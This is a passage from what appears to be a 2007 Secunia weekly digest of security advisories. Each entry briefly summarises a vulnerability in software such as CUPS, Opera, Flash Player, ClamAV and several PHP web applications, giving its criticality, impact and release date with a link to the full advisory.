Gentoo has issued an update for ircservices. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28090/ -- [SA28086] Debian update for mydns Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-17 Debian has issued an update for mydns. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28086/ -- [SA28151] Sun Management Center Default Account Security Issue Critical: Moderately critical Where: From local network Impact: Security Bypass Released: 2007-12-19 A security issue has been reported in Sun Management Center, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28151/ -- [SA28129] CUPS SNMP Backend "asn1_get_string()" Signedness Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2007-12-18 A vulnerability has been reported in CUPS, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28129/ -- [SA28089] Avaya Products Samba "send_mailslot()" Buffer Overflow Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-14 Avaya has acknowledged a vulnerability in various Avaya products, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28089/ -- [SA28087] HP-UX DCE swagentd Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2007-12-14 A vulnerability has been reported in HP-UX, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28087/ -- [SA28162] Red Hat update for kernel Critical: Less critical Where: From remote Impact: DoS Released: 2007-12-20 Red Hat has issued an update for the kernel. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28162/ -- [SA28107] rPath update for tetex Critical: Less critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information, DoS, System access Released: 2007-12-18 rPath has issued an update for tetex. This fixes some vulnerabilities, which can be exploited by malicious, local users to disclose and manipulate sensitive information and by malicious people to potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28107/ -- [SA28148] Sun Ray Device Manager Daemon Data Manipulation and DoS Critical: Less critical Where: From local network Impact: Manipulation of data, DoS Released: 2007-12-19 Some vulnerabilities have been reported in Sun Ray Server Software, which can be exploited by malicious, local users or malicious people to manipulate certain data or cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28148/ -- [SA28108] Slackware update for mysql Critical: Less critical Where: From local network Impact: Security Bypass, Manipulation of data, DoS Released: 2007-12-17 Slackware has issued an update for mysql. This fixes a security issue and some vulnerabilities, which can be exploited by malicious, local users to manipulate certain data and by malicious users to bypass certain security restrictions and cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28108/ -- [SA28099] Red Hat update for mysql Critical: Less critical Where: From local network Impact: Manipulation of data, DoS Released: 2007-12-19 Red Hat has issued an update for mysql. This fixes some vulnerabilities, which can be exploited by malicious, local users to manipulate certain data and by malicious users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28099/ -- [SA28139] Alternate pdftops Filter for CUPS Insecure Temporary Files Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-18 A security issue has been reported in the Alternate pdftops Filter for CUPS, which can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/28139/ -- [SA28123] scponly Command Passthrough Security Bypass Critical: Less critical Where: Local system Impact: Security Bypass Released: 2007-12-17 A security issue has been reported in scponly, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28123/ -- [SA28105] Linux Kernel "hrtimer_start()" Integer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Unknown Released: 2007-12-17 A vulnerability with an unknown impact has been reported in the Linux Kernel. Full Advisory: http://secunia.com/advisories/28105/ -- [SA28097] Fedora update for autofs Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-17 Fedora has issued an update for autofs. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/28097/ -- [SA28094] Gentoo Portage "etc-update" Information Disclosure Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2007-12-14 Gentoo has acknowledged a security issue in Portage, which can be exploited by malicious, local users to disclose potentially sensitive information. Full Advisory: http://secunia.com/advisories/28094/ -- [SA28088] rPath update for kernel Critical: Less critical Where: Local system Impact: Unknown Released: 2007-12-19 rPath has issued an update for the kernel. This fixes a vulnerability with an unknown impact. Full Advisory: http://secunia.com/advisories/28088/ -- [SA28181] rPath update for kdebase Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-20 rPath has issued an update for kdebase. This fixes a weakness, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28181/ -- [SA28104] KDE KDM Local Denial of Service Weakness Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-20 A weakness has been reported in KDE, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28104/ Other:-- [SA28175] Cisco Firewall Services Module Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-20 A vulnerability has been reported in the Cisco Firewall Services Module (FWSM), which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28175/ -- [SA28100] Juniper JUNOS BGP UPDATE Message Processing Denial of Service Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-17 A vulnerability has been reported in Juniper JUNOS, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28100/ -- [SA28096] Sun Solaris 10 NFS "netgroups" Security Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2007-12-14 Sun has acknowledged a vulnerability in Solaris, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28096/ -- [SA28093] NeoOffice Unspecified OpenOffice.org Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2007-12-14 A vulnerability with an unknown impact has been reported in NeoOffice. Full Advisory: http://secunia.com/advisories/28093/ Cross Platform:-- [SA28169] Opera Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Exposure of sensitive information, System access Released: 2007-12-19 Some vulnerabilities have been reported in Opera, which can be exploited by malicious people to bypass certain security restrictions, disclose sensitive information, and compromise a user's system. Full Advisory: http://secunia.com/advisories/28169/ -- [SA28161] Adobe Flash Player Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Unknown, Security Bypass, Cross Site Scripting, Manipulation of data, Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2007-12-19 Some vulnerabilities have been reported in Adobe Flash Player, where one vulnerability has an unknown impact and others can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions, conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/28161/ -- [SA28117] ClamAV "cli_scanpe()" MEW Handling Integer Overflow Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-19 A vulnerability has been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28117/ -- [SA28095] SquirrelMail Package Compromise Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-14 A package compromise has been reported in SquirrelMail, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28095/ -- [SA28092] Apple QuickTime Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-14 Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28092/ -- [SA28155] phpMyRealty Two SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-12-19 Koller has reported two vulnerabilities in phpMyRealty (PMR), which can be exploited by malicious people and malicious users to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28155/ -- [SA28154] Dokeos "My productions" Multiple Extensions File Upload Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-19 A vulnerability has been discovered in Dokeos, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28154/ -- [SA28138] PunBB Automatic Image Upload with Thumbnails Module File Upload Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, System access Released: 2007-12-18 Peter sterberg has discovered a vulnerability in the Automatic Image Upload with Thumbnails module for PunBB, which can be exploited by malicious users to conduct cross-site scripting attacks and to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28138/ -- [SA28137] LineShout Two Script Insertion Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-18 David Sopas has reported two vulnerabilities in LineShout, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/28137/ -- [SA28126] FreeWebshop.org Admin Credentials Information Disclosure Critical: Moderately critical Where: From remote Impact: Security Bypass, Exposure of sensitive information Released: 2007-12-17 k1tk4t has discovered a vulnerability in FreeWebshop.org, which can be exploited by malicious people to bypass certain security restrictions and to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28126/ -- [SA28124] Hammer of Thyrion "HuffDecode()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-17 A vulnerability has been reported in Hammer of Thyrion, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28124/ -- [SA28119] PHP Real Estate Classifieds "id" SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-12-18 t0pP8uZz & xprog have reported a vulnerability in PHP Real Estate Classifieds, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28119/ -- [SA28110] exiftags Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-17 Some vulnerabilities have been reported in exiftags, which potentially can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28110/ -- [SA28098] CourseMill Learning Management System "user" SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-14 sasquatch has reported a vulnerability in CourseMill Learning Management System, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28098/ -- [SA28164] GF-3XPLORER Cross-Site Scripting and Information Disclosure Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-19 MhZ91 has discovered a vulnerability and a security issue in GF-3XPLORER, which can be exploited by malicious people to conduct cross-site scripting attacks or to disclose system information. Full Advisory: http://secunia.com/advisories/28164/ -- [SA28149] Asterisk Registration Database Security Bypass Critical: Less critical Where: From remote Impact: Security Bypass Released: 2007-12-19 A security issue has been reported in Asterisk, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28149/ -- [SA28133] Mambo Two Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-19 Beenu Arora has discovered two vulnerabilities in Mambo, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28133/ -- [SA28130] WordPress Draft Information Disclosure Critical: Less critical Where: From remote Impact: Security Bypass, Exposure of sensitive information Released: 2007-12-19 Michael Brooks has discovered a vulnerability in WordPress, which can be exploited by malicious people to bypass certain security restrictions and to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28130/ -- [SA28122] Google Web Toolkit Benchmark Reporting System Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-18 A vulnerability has been reported in Google Web Toolkit, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28122/ -- [SA28116] Ganglia Web Interface Multiple Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-17 Some vulnerabilities have been reported in Ganglia, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28116/ -- [SA28106] Flyspray Two Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-17 Two vulnerabilities have been reported in Flyspray, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28106/ -- [SA28118] syslog-ng Timestamps Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2007-12-18 A vulnerability has been reported in syslog-ng, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28118/ ===========